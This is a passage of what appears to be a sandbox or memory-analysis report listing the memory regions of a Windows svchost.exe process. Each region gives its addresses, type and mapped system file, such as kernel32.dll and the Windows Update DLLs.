entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 487 start_va = 0x230000 end_va = 0x233fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 488 start_va = 0x240000 end_va = 0x249fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 489 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 490 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 491 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 492 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 493 start_va = 0x470000 end_va = 0x473fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 494 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 495 start_va = 0x490000 end_va = 0x493fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 496 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 497 start_va = 0x4b0000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 498 start_va = 0x640000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 499 start_va = 0x7d0000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 500 start_va = 0x890000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 501 start_va = 0x8c0000 end_va = 0x8cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 502 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 503 start_va = 0x950000 end_va = 0x957fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 504 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 505 start_va = 0x970000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 506 start_va = 0x980000 end_va = 0x980fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 507 start_va = 0x990000 end_va = 0x990fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 508 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 509 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 510 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 511 start_va = 0x9d0000 end_va = 0x9d6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 512 start_va = 0x9e0000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 513 start_va = 0x9f0000 end_va = 0xa0bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 514 start_va = 0xa10000 end_va = 0xa15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netcfgx.dll.mui" filename = "\\Windows\\System32\\en-US\\netcfgx.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netcfgx.dll.mui") Region: id = 515 start_va = 0xa20000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 516 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 517 start_va = 0xab0000 end_va = 0xab5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 518 start_va = 0xac0000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 519 start_va = 0xb40000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 520 start_va = 0xbc0000 end_va = 0xbd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 521 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 522 start_va = 0xbf0000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 523 start_va = 0xc70000 end_va = 0xf3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 524 start_va = 0xf40000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 525 start_va = 0xfc0000 end_va = 0xfc7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 526 start_va = 0xfd0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 527 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 528 start_va = 0x1060000 end_va = 0x10c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 529 start_va = 0x10d0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 530 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 531 start_va = 0x11d0000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 532 start_va = 0x11e0000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 533 start_va = 0x1260000 end_va = 0x12dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 534 start_va = 0x12e0000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 535 start_va = 0x12f0000 end_va = 0x13affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 536 start_va = 0x13b0000 end_va = 0x13bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 537 start_va = 0x13c0000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013c0000" filename = "" Region: id = 538 start_va = 0x13d0000 end_va = 0x13dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013d0000" filename = "" Region: id = 539 start_va = 0x13e0000 end_va = 0x13effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013e0000" filename = "" Region: id = 540 start_va = 0x13f0000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013f0000" filename = "" Region: id = 541 start_va = 0x1400000 end_va = 0x140ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001400000" filename = "" Region: id = 542 start_va = 0x1410000 end_va = 0x141ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001410000" filename = "" Region: id = 543 start_va = 0x1420000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 544 start_va = 0x1430000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001430000" filename = "" Region: id = 545 start_va = 0x1440000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001440000" filename = "" Region: id = 546 start_va = 0x1450000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001450000" filename = "" Region: id = 547 start_va = 0x1460000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001460000" filename = "" Region: id = 548 start_va = 0x1470000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 549 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 550 start_va = 0x1500000 end_va = 0x157ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 551 start_va = 0x1580000 end_va = 0x1580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 552 start_va = 0x1590000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 553 start_va = 0x1610000 end_va = 0x1611fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 554 start_va = 0x1620000 end_va = 0x169ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 555 start_va = 0x16a0000 end_va = 0x16a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 556 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 557 start_va = 0x1730000 end_va = 0x173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 558 start_va = 0x1740000 end_va = 0x1747fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 559 start_va = 0x1750000 end_va = 0x17cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 560 start_va = 0x17d0000 end_va = 0x184ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 561 start_va = 0x1850000 end_va = 0x18cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 562 start_va = 0x18d0000 end_va = 0x18dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 563 start_va = 0x18e0000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018e0000" filename = "" Region: id = 564 start_va = 0x18f0000 end_va = 0x18fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 565 start_va = 0x1900000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 566 start_va = 0x1980000 end_va = 0x198ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 567 start_va = 0x1990000 end_va = 0x199ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 568 start_va = 0x19a0000 end_va = 0x19a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 569 start_va = 0x19b0000 end_va = 0x1a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 570 start_va = 0x1a30000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 571 start_va = 0x1a40000 end_va = 0x1a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 572 start_va = 0x1a50000 end_va = 0x1a57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 573 start_va = 0x1a60000 end_va = 0x1a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 574 start_va = 0x1a80000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 575 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 576 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 577 start_va = 0x1d20000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 578 start_va = 0x1db0000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 579 start_va = 0x1e50000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 580 start_va = 0x1f00000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 581 start_va = 0x1f80000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 582 start_va = 0x2050000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 583 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 584 start_va = 0x2100000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 585 start_va = 0x2140000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 586 start_va = 0x2190000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 587 start_va = 0x22d0000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 588 start_va = 0x2390000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 589 start_va = 0x2410000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 590 start_va = 0x24d0000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 591 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 592 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 593 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 594 start_va = 0x27d0000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 595 start_va = 0x2870000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 596 start_va = 0x2960000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 597 start_va = 0x29e0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 598 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 599 start_va = 0x2b40000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 600 start_va = 0x2bd0000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 601 start_va = 0x2c20000 end_va = 0x2c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c20000" filename = "" Region: id = 602 start_va = 0x2ca0000 end_va = 0x2d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 603 start_va = 0x2d20000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 604 start_va = 0x2da0000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 605 start_va = 0x2ee0000 end_va = 0x2fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 606 start_va = 0x2fe0000 end_va = 0x31dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 607 start_va = 0x3210000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 608 start_va = 0x3290000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 609 start_va = 0x3350000 end_va = 0x33cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 610 start_va = 0x33f0000 end_va = 0x346ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 611 start_va = 0x34c0000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 612 start_va = 0x35a0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 613 start_va = 0x3620000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 614 start_va = 0x3a50000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 615 start_va = 0x3b80000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b80000" filename = "" Region: id = 616 start_va = 0x3c80000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 617 start_va = 0x3d10000 end_va = 0x3d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 618 start_va = 0x3da0000 end_va = 0x3e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003da0000" filename = "" Region: id = 619 start_va = 0x3e40000 end_va = 0x3ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 620 start_va = 0x3f10000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 621 start_va = 0x3fe0000 end_va = 0x405ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 622 start_va = 0x4060000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 623 start_va = 0x42e0000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 624 start_va = 0x4420000 end_va = 0x449ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 625 start_va = 0x44a0000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 626 start_va = 0x45a0000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 627 start_va = 0x4720000 end_va = 0x472ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 628 start_va = 0x4730000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004730000" filename = "" Region: id = 629 start_va = 0x4830000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 630 start_va = 0x4950000 end_va = 0x49cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004950000" filename = "" Region: id = 631 start_va = 0x4a00000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 632 start_va = 0x4ac0000 end_va = 0x4b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 633 start_va = 0x4b40000 end_va = 0x4c3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 634 start_va = 0x4c40000 end_va = 0x4d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 635 start_va = 0x4d40000 end_va = 0x5d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 636 start_va = 0x5d80000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 637 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 638 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 639 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 640 start_va = 0x76ee0000 end_va = 0x76ee6fff monitored = 0 entry_point = 0x76ee106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 641 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 642 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 643 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 644 start_va = 0xffa90000 end_va = 0xffa9afff monitored = 0 entry_point = 0xffa9246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 645 start_va = 0x7fef2180000 end_va = 0x7fef23d2fff monitored = 0 entry_point = 0x7fef218236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 646 start_va = 0x7fef3070000 end_va = 0x7fef30b4fff monitored = 0 entry_point = 0x7fef30a3644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 647 start_va = 0x7fef3ec0000 end_va = 0x7fef3ed1fff monitored = 0 entry_point = 0x7fef3ec90bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 648 start_va = 0x7fef4240000 end_va = 0x7fef44b9fff monitored = 0 entry_point = 0x7fef4272200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 649 start_va = 0x7fef46f0000 end_va = 0x7fef46f9fff monitored = 0 entry_point = 0x7fef46f3994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 650 start_va = 0x7fef4710000 end_va = 0x7fef472bfff monitored = 0 entry_point = 0x7fef47111a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 651 start_va = 0x7fef4730000 end_va = 0x7fef4791fff monitored = 0 entry_point = 0x7fef4731198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 652 start_va = 0x7fef47a0000 end_va = 0x7fef47d9fff monitored = 0 entry_point = 0x7fef47a1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 653 start_va = 0x7fef4e70000 end_va = 0x7fef4ee0fff monitored = 0 entry_point = 0x7fef4eaecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 654 start_va = 0x7fef5e70000 end_va = 0x7fef5f41fff monitored = 0 entry_point = 0x7fef5f01a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 655 start_va = 0x7fef6110000 end_va = 0x7fef611efff monitored = 0 entry_point = 0x7fef6119a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 656 start_va = 0x7fef6120000 end_va = 0x7fef613afff monitored = 0 entry_point = 0x7fef6121198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 657 start_va = 0x7fef6830000 end_va = 0x7fef691dfff monitored = 0 entry_point = 0x7fef68312a0 region_type = mapped_file name = "actxprxy.dll" filename = 